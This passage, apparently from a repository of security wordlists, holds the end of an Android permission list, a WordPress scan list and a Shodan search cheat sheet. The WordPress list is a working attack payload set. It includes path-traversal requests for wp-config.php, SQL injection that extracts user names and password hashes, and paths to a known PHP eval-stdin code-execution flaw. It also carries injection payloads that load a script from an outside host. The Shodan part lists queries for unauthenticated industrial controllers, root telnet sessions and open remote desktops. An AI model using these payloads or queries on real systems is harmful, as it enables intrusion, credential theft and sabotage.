android.permission.REBOOT 238 | android.permission.RECEIVE_BLUETOOTH_MAP 239 | android.permission.RECEIVE_BOOT_COMPLETED 240 | android.permission.RECEIVE_DATA_ACTIVITY_CHANGE 241 | android.permission.RECEIVE_EMERGENCY_BROADCAST 242 | android.permission.RECEIVE_MEDIA_RESOURCE_USAGE 243 | android.permission.RECEIVE_STK_COMMANDS 244 | android.permission.RECEIVE_WIFI_CREDENTIAL_CHANGE 245 | android.permission.RECOVERY 246 | android.permission.REGISTER_CALL_PROVIDER 247 | android.permission.REGISTER_CONNECTION_MANAGER 248 | android.permission.REGISTER_SIM_SUBSCRIPTION 249 | android.permission.REGISTER_WINDOW_MANAGER_LISTENERS 250 | android.permission.REMOTE_AUDIO_PLAYBACK 251 | android.permission.REMOVE_DRM_CERTIFICATES 252 | android.permission.REMOVE_TASKS 253 | android.permission.REORDER_TASKS 254 | android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS 255 | android.permission.REQUEST_INSTALL_PACKAGES 256 | android.permission.RESET_FINGERPRINT_LOCKOUT 257 | android.permission.RESET_SHORTCUT_MANAGER_THROTTLING 258 | android.permission.RESTART_PACKAGES 259 | android.permission.RETRIEVE_WINDOW_CONTENT 260 | android.permission.RETRIEVE_WINDOW_TOKEN 261 | android.permission.REVOKE_RUNTIME_PERMISSIONS 262 | android.permission.SCORE_NETWORKS 263 | android.permission.SEND_CALL_LOG_CHANGE 264 | android.permission.SEND_DOWNLOAD_COMPLETED_INTENTS 265 | android.permission.SEND_RESPOND_VIA_MESSAGE 266 | android.permission.SEND_SMS_NO_CONFIRMATION 267 | android.permission.SERIAL_PORT 268 | android.permission.SET_ACTIVITY_WATCHER 269 | android.permission.SET_ALWAYS_FINISH 270 | android.permission.SET_ANIMATION_SCALE 271 | android.permission.SET_DEBUG_APP 272 | android.permission.SET_INPUT_CALIBRATION 273 | android.permission.SET_KEYBOARD_LAYOUT 274 | android.permission.SET_ORIENTATION 275 | android.permission.SET_POINTER_SPEED 276 | android.permission.SET_PREFERRED_APPLICATIONS 277 | android.permission.SET_PROCESS_LIMIT 278 | android.permission.SET_SCREEN_COMPATIBILITY 279 | android.permission.SET_TIME 280 | android.permission.SET_TIME_ZONE 281 | android.permission.SET_WALLPAPER 282 | android.permission.SET_WALLPAPER_COMPONENT 283 | android.permission.SET_WALLPAPER_HINTS 284 | android.permission.SHUTDOWN 285 | android.permission.SIGNAL_PERSISTENT_PROCESSES 286 | android.permission.START_ANY_ACTIVITY 287 | android.permission.START_PRINT_SERVICE_CONFIG_ACTIVITY 288 | android.permission.START_TASKS_FROM_RECENTS 289 | android.permission.STATUS_BAR 290 | android.permission.STATUS_BAR_SERVICE 291 | android.permission.STOP_APP_SWITCHES 292 | android.permission.STORAGE_INTERNAL 293 | android.permission.SUBSCRIBED_FEEDS_READ 294 | android.permission.SUBSCRIBED_FEEDS_WRITE 295 | android.permission.SUBSTITUTE_NOTIFICATION_APP_NAME 296 | android.permission.SYSTEM_ALERT_WINDOW 297 | android.permission.TABLET_MODE 298 | android.permission.TEMPORARY_ENABLE_ACCESSIBILITY 299 | android.permission.TETHER_PRIVILEGED 300 | android.permission.TRANSMIT_IR 301 | android.permission.TRUST_LISTENER 302 | android.permission.TV_INPUT_HARDWARE 303 | android.permission.TV_VIRTUAL_REMOTE_CONTROLLER 304 | android.permission.UPDATE_APP_OPS_STATS 305 | android.permission.UPDATE_CONFIG 306 | android.permission.UPDATE_DEVICE_STATS 307 | android.permission.UPDATE_LOCK 308 | android.permission.UPDATE_LOCK_TASK_PACKAGES 309 | android.permission.USER_ACTIVITY 310 | android.permission.USE_CREDENTIALS 311 | android.permission.VIBRATE 312 | android.permission.WAKE_LOCK 313 | android.permission.WRITE_APN_SETTINGS 314 | android.permission.WRITE_BLOCKED_NUMBERS 315 | android.permission.WRITE_DREAM_STATE 316 | android.permission.WRITE_GSERVICES 317 | android.permission.WRITE_MEDIA_STORAGE 318 | android.permission.WRITE_PROFILE 319 | android.permission.WRITE_SECURE_SETTINGS 320 | android.permission.WRITE_SETTINGS 321 | android.permission.WRITE_SMS 322 | android.permission.WRITE_SOCIAL_STREAM 323 | android.permission.WRITE_SYNC_SETTINGS 324 | android.permission.WRITE_USER_DICTIONARY -------------------------------------------------------------------------------- /wordpress-random.txt: -------------------------------------------------------------------------------- 1 | ///wp-admin/install.php 2 | //2019/wp-login.php 3 | //2020/wp-login.php 4 | //blog/wp-admin/install.php 5 | //new/wp-admin/install.php 6 | //old/wp-admin/install.php 7 | //old/wp-login.php 8 | //oldsite/wp-admin/install.php 9 | //test/wp-login.php 10 | //wordpress/wp-admin/install.php 11 | //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 12 | //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 13 | //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 14 | //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 15 | //wp-content/plugins/prh-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 16 | //wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 17 | //wp-content/uploads/2018/01/abc/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 18 | //wp/wp-admin/install.php 19 | //wp/wp-login.php 20 | //wp1/wp-login.php 21 | //wp2/wp-login.php 22 | /admin/wp-login.php 23 | /blog/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php 24 | /blog/wp-login.php 25 | /test/wp-login.php 26 | /wordpress/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php 27 | /wordpress/wp-login.php 28 | /wp-admin 29 | /wp-admin/ 30 | /wp-admin/admin-ajax.php 31 | /wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php 32 | /wp-admin/admin-ajax.php?action=duplicator_download&file=dupl.txt 33 | /wp-admin/admin-ajax.php?action=hc_ajax_save_option 34 | /wp-admin/admin-ajax.php?action=import_csv 35 | /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php 36 | /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php 37 | /wp-admin/admin-ajax.php?action=rss&type=video&vid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,md5(2349819),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23 38 | /wp-admin/admin-ajax.php?action=save_map_name 39 | /wp-admin/admin-ajax.php?action=wdt_upload_file 40 | /wp-admin/admin-ajax.php?do_reset_wordpress=1 41 | /wp-admin/admin-ajax.php?page=wppcp-security-settings-page 42 | /wp-admin/admin-ajax.php?page=wppcp-settings 43 | /wp-admin/admin-post.php 44 | /wp-admin/admin-post.php?action=hc_ajax_save_option 45 | /wp-admin/admin-post.php?do_reset_wordpress=1 46 | /wp-admin/admin-post.php?page=br-aapf-setup&step=wizard_selectors 47 | /wp-admin/admin-post.php?page=fp_admin_options_page 48 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email="> 49 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email="> 50 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v15%5C'%3E%3C/script%3E 51 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v6%5C'%3E%3C/script%3E 52 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})(); 53 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)(); 54 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success="> 55 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success="> 56 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v15%5C'%3E%3C/script%3E 57 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v6%5C'%3E%3C/script%3E 58 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})(); 59 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&uid=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&token=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&email=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&fly_id=1&article_placement_id=1&sidebar_placement_id=1&return_path=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})(); 60 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)(); 61 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();&uid=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();&token=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();&email=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();&fly_id=1&article_placement_id=1&sidebar_placement_id=1&return_path=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)(); 62 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token="> 63 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token="> 64 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v15%5C'%3E%3C/script%3E 65 | /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v6%5C'%3E%3C/script%3E 66 | /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1§ion=gapi 67 | /wp-admin/admin-post.php?page=wpim_manage_settings 68 | /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon 69 | /wp-admin/admin-post.php?page=yuzo-related-post 70 | /wp-admin/admin-post.php?testingfsoc=1&url=https://pastebin.com/raw/i1gLLhHJ&filename=wpdemos 71 | /wp-admin/admin-post.php?wpematico-action=settings_tab_settings 72 | /wp-admin/admin-post.php?yp_remote_get=2 73 | /wp-admin/admin-post.php?yp_remote_get=3 74 | /wp-admin/admin-post.php?yp_remote_get=test 75 | /wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes 76 | /wp-admin/plugin-install.php?tab=upload 77 | /wp-admin/post-new.php 78 | /wp-admin/theme-editor.php 79 | /wp-config.php 80 | /wp-config.php-bak 81 | /wp-config.php.bak 82 | /wp-config.php.new 83 | /wp-config.php.old 84 | /wp-config.php?aam-media=1 85 | /wp-config.php_Old 86 | /wp-config.php_bak 87 | /wp-config.php_new 88 | /wp-config.php_old 89 | /wp-config.php~ 90 | /wp-content/adminer.php 91 | /wp-content/force-download.php?file=../../../../../../../wp-config.php 92 | /wp-content/plugins/CCSlider/includes/upload.php 93 | /wp-content/plugins/accessally/resource/backend/css/accessally-manage.css 94 | /wp-content/plugins/adminer/inc/editor/index.php 95 | /wp-content/plugins/ajax_multi_upload/readme.txt 96 | /wp-content/plugins/all-video-gallery/config.php?vid=1&pid=-1+union+select+1,2,3,4,concat(0x7e7e7e,74657374,0x7c7c7c,md5(74657374),0x7e7e7e),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+-- 97 | /wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php 98 | /wp-content/plugins/batchmove/js/batch.js 99 | /wp-content/plugins/blaze-slide-show-for-wordpress/js/swfupload/js/upload.php 100 | /wp-content/plugins/blnmrpb/log.txt 101 | /wp-content/plugins/brizy/public/static/css/style.css 102 | /wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css 103 | /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php 104 | /wp-content/plugins/contact-form-7/readme.txt 105 | /wp-content/plugins/contus-hd-flv-player/uploadVideo.php 106 | /wp-content/plugins/contus-video-galleryversion-10/upload1.php 107 | /wp-content/plugins/front-file-manager/readme.txt 108 | /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php 109 | /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php 110 | /wp-content/plugins/hd-webplayer/playlist.php?videoid=1+and+1=2+/*!union*/+/*!select*/+concat(0x7e7e7e,user_login,0x7c7c7c,user_pass,0x7e7e7e),2,3,4,5,6,7,8,9,10,11+from+wp_users 111 | /wp-content/plugins/html5avmanager/lib/uploadify/uploadify.css 112 | /wp-content/plugins/image-clipboard/readme.txt 113 | /wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php 114 | /wp-content/plugins/indeed-membership-pro/assets/css/templates.css 115 | /wp-content/plugins/iwp-client/clipboard.min.js 116 | /wp-content/plugins/iwp-client/readme.txt 117 | /wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 118 | /wp-content/plugins/jssor-slider/assets/css/jssor-slider.css 119 | /wp-content/plugins/linklove/linklove.php?s=true 120 | /wp-content/plugins/mac-dock-gallery/readme.txt 121 | /wp-content/plugins/mailcwp/mailcwp-upload.php 122 | /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php 123 | /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php 124 | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php 125 | /wp-content/plugins/profile-builder-pro/assets/css/style-front-end.css 126 | /wp-content/plugins/profile-builder/assets/css/serial-notice.css 127 | /wp-content/plugins/profile-builder/assets/css/style-front-end.css 128 | /wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php 129 | /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php 130 | /wp-content/plugins/revslider/temp/update_extract/readme.php 131 | /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php 132 | /wp-content/plugins/slide-show-pro/js/swfupload/js/upload.php 133 | /wp-content/plugins/smart-slide-show/js/swfupload/js/upload.php 134 | /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php 135 | /wp-content/plugins/strong-testimonials/templates/modern/content.css 136 | /wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php 137 | /wp-content/plugins/themegrill-demo-importer/assets/js/admin/demo-importer.js 138 | /wp-content/plugins/uploadify/includes/check.php 139 | /wp-content/plugins/uploadify/readme.txt 140 | /wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=verify.php 141 | /wp-content/plugins/wordpress-database-reset/assets/css/bsmselect.css 142 | /wp-content/plugins/wp-central/readme.txt 143 | /wp-content/plugins/wp-phpmyadmin/wp-phpmyadmin/phpmyadmin/ 144 | /wp-content/plugins/wp-private-content-plus/css/wppcp-front.css 145 | /wp-content/plugins/wp-time-capsule/js/opentip-jquery.js 146 | /wp-content/plugins/wp-time-capsule/treeView/common.js 147 | /wp-content/plugins/wp-time-capsule/wptc-dialog.css 148 | /wp-content/plugins/wpematico/app/js/wpe_hooks.js 149 | /wp-content/plugins/wpshopify/dist/public.min.css 150 | /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php 151 | /wp-content/plugins/yellow-pencil-visual-theme-customizer/js/yellow-pencil.js 152 | /wp-content/plugins/yuzo-related-post/assets/js/admin.js 153 | /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php 154 | /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php 155 | /wp-content/themes/infocus/lib/scripts/dl-skin.php 156 | /wp-content/themes/linenity/functions/download.php?imgurl=theme-functions.php&name=theme-functions.php 157 | /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php 158 | /wp-content/themes/twentynineteen/404.php 159 | /wp-content/themes/twentytwenty/404.php 160 | /wp-content/themes/wp-update.php 161 | /wp-content/uploads/2017/06/cropped-15-180x180.jpeg 162 | /wp-content/uploads/2017/06/cropped-15-192x192.jpeg 163 | /wp-content/uploads/2017/06/cropped-15-270x270.jpeg 164 | /wp-content/uploads/2017/06/cropped-15-32x32.jpeg 165 | /wp-content/uploads/adminer.php 166 | /wp-content/uploads/file-manager/log.txt 167 | /wp-login.php 168 | /wp-login.php?action=register 169 | /wp/wp-login.php 170 | -------------------------------------------------------------------------------- /shodan-dorks.txt: -------------------------------------------------------------------------------- 1 | # Basic Shodan Filters 2 | ### city: 3 | Find devices in a particular city. 4 | `city:"Bangalore"` 5 | 6 | ### country: 7 | Find devices in a particular country. 8 | `country:"IN"` 9 | 10 | ### geo: 11 | Find devices by giving geographical coordinates. 12 | `geo:"56.913055,118.250862"` 13 | 14 | ### Location 15 | `country:us` 16 | `country:ru country:de city:chicago` 17 | 18 | ### hostname: 19 | Find devices matching the hostname. 20 | `server: "gws" hostname:"google"` 21 | `hostname:example.com -hostname:subdomain.example.com` 22 | `hostname:example.com,example.org` 23 | 24 | ### net: 25 | Find devices based on an IP address or /x CIDR. 26 | `net:210.214.0.0/16` 27 | 28 | ### Organization 29 | `org:microsoft` 30 | `org:"United States Department"` 31 | 32 | ### Autonomous System Number (ASN) 33 | `asn:ASxxxx` 34 | 35 | ### os: 36 | Find devices based on operating system. 37 | `os:"windows 7"` 38 | 39 | ### port: 40 | Find devices based on open ports. 41 | `proftpd port:21` 42 | 43 | ### before/after: 44 | Find devices before or after between a given time. 45 | `apache after:22/02/2009 before:14/3/2010` 46 | 47 | ### SSL/TLS Certificates 48 | Self signed certificates 49 | `ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com` 50 | 51 | Expired certificates 52 | `ssl.cert.expired:true` 53 | 54 | `ssl.cert.subject.cn:example.com` 55 | 56 | ### Device Type 57 | `device:firewall` 58 | `device:router` 59 | `device:wap` 60 | `device:webcam` 61 | `device:media` 62 | `device:"broadband router"` 63 | `device:pbx` 64 | `device:printer` 65 | `device:switch` 66 | `device:storage` 67 | `device:specialized` 68 | `device:phone` 69 | `device:"voip"` 70 | `device:"voip phone"` 71 | `device:"voip adaptor"` 72 | `device:"load balancer"` 73 | `device:"print server"` 74 | `device:terminal` 75 | `device:remote` 76 | `device:telecom` 77 | `device:power` 78 | `device:proxy` 79 | `device:pda` 80 | `device:bridge` 81 | 82 | ### Operating System 83 | `os:"windows 7"` 84 | `os:"windows server 2012"` 85 | `os:"linux 3.x"` 86 | 87 | ### Product 88 | `product:apache` 89 | `product:nginx` 90 | `product:android` 91 | `product:chromecast` 92 | 93 | ### Customer Premises Equipment (CPE) 94 | `cpe:apple` 95 | `cpe:microsoft` 96 | `cpe:nginx` 97 | `cpe:cisco` 98 | 99 | ### Server 100 | `server: nginx` 101 | `server: apache` 102 | `server: microsoft` 103 | `server: cisco-ios` 104 | 105 | ### ssh fingerprints 106 | `dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0` 107 | 108 | # Web 109 | 110 | ### Pulse Secure 111 | `http.html:/dana-na` 112 | ### PEM Certificates 113 | `http.title:"Index of /" http.html:".pem"` 114 | 115 | # Databases 116 | ### MySQL 117 | `"product:MySQL"` 118 | 119 | ### MongoDB 120 | `"product:MongoDB"` 121 | `mongodb port:27017` 122 | 123 | ### Fully open MongoDBs 124 | `"MongoDB Server Information { "metrics":"` 125 | `"Set-Cookie: mongo-express=" "200 OK"` 126 | 127 | ### Kibana dashboards without authentication 128 | `kibana content-legth:217` 129 | 130 | ### elastic 131 | `port:9200 json` 132 | `port:"9200" all:elastic` 133 | 134 | ### Memcached 135 | `"product:Memcached"` 136 | 137 | ### CouchDB 138 | `"product:CouchDB"` 139 | `port:"5984"+Server: "CouchDB/2.1.0"` 140 | 141 | ### PostgreSQL 142 | `"port:5432 PostgreSQL"` 143 | 144 | ### Riak 145 | `"port:8087 Riak"` 146 | 147 | ### Redis 148 | `"product:Redis"` 149 | 150 | ### Cassandra 151 | `"product:Cassandra"` 152 | 153 | # Industrial Control Systems 154 | ### Samsung Electronic Billboards 155 | 156 | `"Server: Prismview Player"` 157 | 158 | ### Gas Station Pump Controllers 159 | 160 | `"in-tank inventory" port:10001` 161 | 162 | ### Fuel Pumps connected to internet: 163 | No auth required to access CLI terminal.
164 | `"privileged command" GET` 165 | 166 | ### Automatic License Plate Readers 167 | 168 | `P372 "ANPR enabled"` 169 | 170 | ### Traffic Light Controllers / Red Light Cameras 171 | 172 | `mikrotik streetlight` 173 | 174 | ### Voting Machines in the United States 175 | 176 | "voter system serial" country:US 177 | 178 | ### Open ATM: 179 | May allow for ATM Access availability 180 | `NCR Port:"161"` 181 | 182 | ### Telcos Running Cisco Lawful Intercept Wiretaps 183 | 184 | `"Cisco IOS" "ADVIPSERVICESK9_LI-M"` 185 | 186 | ### Prison Pay Phones 187 | 188 | `"[2J[H Encartele Confidential"` 189 | 190 | ### Tesla PowerPack Charging Status 191 | 192 | `http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2` 193 | 194 | ### Electric Vehicle Chargers 195 | 196 | `"Server: gSOAP/2.8" "Content-Length: 583"` 197 | 198 | ### Maritime Satellites 199 | 200 | Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too! 201 | 202 | `"Cobham SATCOM" OR ("Sailor" "VSAT")` 203 | 204 | ### Submarine Mission Control Dashboards 205 | 206 | `title:"Slocum Fleet Mission Control"` 207 | 208 | ### CAREL PlantVisor Refrigeration Units 209 | 210 | `"Server: CarelDataServer" "200 Document follows"` 211 | 212 | ### Nordex Wind Turbine Farms 213 | 214 | `http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"` 215 | 216 | ### C4 Max Commercial Vehicle GPS Trackers 217 | 218 | `"[1m[35mWelcome on console"` 219 | 220 | ### DICOM Medical X-Ray Machines 221 | 222 | Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet. 223 | 224 | `"DICOM Server Response" port:104` 225 | 226 | ### GaugeTech Electricity Meters 227 | 228 | `"Server: EIG Embedded Web Server" "200 Document follows"` 229 | 230 | ### Siemens Industrial Automation 231 | 232 | `"Siemens, SIMATIC" port:161` 233 | 234 | ### Siemens HVAC Controllers 235 | 236 | `"Server: Microsoft-WinCE" "Content-Length: 12581"` 237 | 238 | ### Door / Lock Access Controllers 239 | 240 | `"HID VertX" port:4070` 241 | 242 | ### Railroad Management 243 | 244 | `"log off" "select the appropriate"` 245 | 246 | ### Tesla Powerpack charging Status: 247 | Helps to find the charging status of tesla powerpack. 248 | `http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2` 249 | 250 | ### XZERES Wind Turbine 251 | `title:"xzeres wind"` 252 | 253 | ### PIPS Automated License Plate Reader 254 | `"html:"PIPS Technology ALPR Processors""` 255 | 256 | ### Modbus 257 | `"port:502"` 258 | 259 | ### Niagara Fox 260 | `"port:1911,4911 product:Niagara"` 261 | 262 | ### GE-SRTP 263 | `"port:18245,18246 product:"general electric""` 264 | 265 | ### MELSEC-Q 266 | `"port:5006,5007 product:mitsubishi"` 267 | 268 | ### CODESYS 269 | `"port:2455 operating system"` 270 | 271 | ### S7 272 | `"port:102"` 273 | 274 | ### BACnet 275 | `"port:47808"` 276 | 277 | ### HART-IP 278 | `"port:5094 hart-ip"` 279 | 280 | ### Omron FINS 281 | `"port:9600 response code"` 282 | 283 | ### IEC 60870-5-104 284 | `"port:2404 asdu address"` 285 | 286 | ### DNP3 287 | `"port:20000 source address"` 288 | 289 | ### EtherNet/IP 290 | `"port:44818"` 291 | 292 | ### PCWorx 293 | `"port:1962 PLC"` 294 | 295 | ### Crimson v3.0 296 | `"port:789 product:"Red Lion Controls"` 297 | 298 | ### ProConOS 299 | `"port:20547 PLC"` 300 | 301 | # Remote Desktop 302 | ### Unprotected VNC 303 | `"authentication disabled" port:5900,5901` 304 | `"authentication disabled" "RFB 003.008"` 305 | 306 | ### Windows RDP 307 | 308 | 99.99% are secured by a secondary Windows login screen. 309 | 310 | `"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"` 311 | 312 | # Network Infrastructure 313 | 314 | ### CobaltStrike Servers 315 | `product:"cobalt strike team server"` 316 | `ssl.cert.serial:146473198` - default certificate serial number 317 | `ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1` 318 | 319 | ### Hacked routers: 320 | Routers which got compromised
321 | `hacked-router-help-sos` 322 | 323 | ### Redis open instances 324 | `product:"Redis key-value store"` 325 | 326 | ### Citrix: 327 | Find Citrix Gateway.

328 | `title:"citrix gateway"` 329 | 330 | ### Weave Scope Dashboards 331 | 332 | Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure. 333 | 334 | `title:"Weave Scope" http.favicon.hash:567176827` 335 | 336 | ### MongoDB 337 | 338 | Older versions were insecure by default. Very scary. 339 | 340 | `"MongoDB Server Information" port:27017 -authentication` 341 | 342 | ### Mongo Express Web GUI 343 | 344 | Like the infamous phpMyAdmin but for MongoDB. 345 | 346 | `"Set-Cookie: mongo-express=" "200 OK"` 347 | 348 | ### Jenkins CI 349 | 350 | `"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"` 351 | 352 | ### Jenkins: 353 | Jenkins Unrestricted Dashboard 354 | `x-jenkins 200` 355 | 356 | ### Docker APIs 357 | 358 | `"Docker Containers:" port:2375` 359 | 360 | ### Docker Private Registries 361 | 362 | `"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab` 363 | 364 | ### Pi-hole Open DNS Servers 365 | 366 | `"dnsmasq-pi-hole" "Recursion: enabled"` 367 | 368 | ### Already Logged-In as root via Telnet 369 | 370 | `"root@" port:23 -login -password -name -Session` 371 | 372 | ### Telnet Access: 373 | NO password required for telnet access.
374 | `port:23 console gateway` 375 | 376 | ### Polycom video-conference system no-auth shell 377 | `"polycom command shell"` 378 | 379 | ### NPort serial-to-eth / MoCA devices without password 380 | `nport -keyin port:23` 381 | 382 | ### Android Root Bridges 383 | 384 | A tangential result of Google's sloppy fractured update approach. 🙄 More information here. 385 | 386 | `"Android Debug Bridge" "Device" port:5555` 387 | 388 | ### Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords 389 | 390 | `Lantronix password port:30718 -secured` 391 | 392 | ### Citrix Virtual Apps 393 | 394 | `"Citrix Applications:" port:1604` 395 | 396 | ### Cisco Smart Install 397 | 398 | Vulnerable (kind of "by design," but especially when exposed). 399 | 400 | `"smart install client active"` 401 | 402 | ### PBX IP Phone Gateways 403 | 404 | `PBX "gateway console" -password port:23` 405 | 406 | ### Polycom Video Conferencing 407 | 408 | `http.title:"- Polycom" "Server: 